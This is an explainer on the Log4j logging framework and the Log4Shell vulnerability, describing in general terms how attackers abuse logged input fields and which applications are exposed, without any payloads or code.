Log4j is a logging framework for Java. Basically, those of us in development and security try to do good by logging things in applications. This helps developers with troubleshooting and helps security analysts find anomalies in those logs. Let’s say you’re developing some application and want to do good, but don’t really want to write all the code to generate those logs. That’s where Log4j comes into play. It’s a free open-source framework, which enables you to easily wrap it into your project and save a ton of time.
Log4j is utilized by millions of third-party enterprise applications, cloud services, and manufacturers, including IoT devices. It’s literally on Mars. The Mars 2020 drone, Ingenuity, is logging data with Log4j.
Unfortunately, a bug in this library allows for a vulnerability we’re calling Log4Shell. This allows an attacker to send a message to a vulnerable application, giving them the potential to execute malicious code.
Factors like the vulnerability being so widespread, the fact that it’s difficult to pinpoint all the places it exists and the vulnerability being extremely easy to exploit makes this a perfect storm. All an attacker needs to do is simply prepare a malicious file, place it on a server they control and send some modified text to a field that’s being logged by the application server.
Once the server logs this string, Log4j will retrieve and execute the malicious code from the attacker’s server. The potential for an attacker to then control the application and move elsewhere within an organization’s network is very real.
Does this mean every software using Log4j is vulnerable to this exploit?
Not at all! The caveat is that your application would need to be logging the field that an attacker could send that modified text to. Think of it like this: Let’s say you have a Java application which allows your users to log in with an account. Do you want to log all the attempted usernames? Probably! But that’s also a great example of a field the attacker could use to submit that modified code instead of a username.